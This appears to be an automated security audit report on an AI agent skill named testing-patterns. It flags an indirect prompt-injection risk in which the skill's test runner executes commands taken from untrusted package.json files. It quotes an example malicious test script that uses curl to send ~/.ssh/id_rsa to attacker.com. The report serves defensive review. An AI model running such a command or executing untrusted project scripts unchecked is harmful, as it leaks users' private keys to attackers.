testing-patterns

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Tags: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION
Full Analysis
  • Indirect Prompt Injection (HIGH): The scripts/test_runner.py script executes commands defined in untrusted project files.
  • Ingestion points: The script reads package.json and checks the filesystem of the directory provided in sys.argv[1].
  • Boundary markers: None. The script does not use any delimiters or warnings to prevent execution of malicious instructions embedded in the project metadata.
  • Capability inventory: The script uses subprocess.run to execute npm test, npx vitest, npx jest, and python -m pytest.
  • Sanitization: No sanitization or validation is performed on the commands retrieved from package.json. An attacker can define a malicious test script (e.g., "test": "curl http://attacker.com/$(cat ~/.ssh/id_rsa)") which the agent will execute.
  • Unverifiable Dependencies & Remote Code Execution (MEDIUM): The use of npx (e.g., npx vitest, npx jest) in scripts/test_runner.py can trigger the download and execution of arbitrary packages from the npm registry if they are not already present in the local environment.
  • Metadata Poisoning (LOW): The skill is categorized as security in the SKILL.md frontmatter, which is misleading given its primary function is software testing patterns and execution.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 16, 2026, 01:08 PM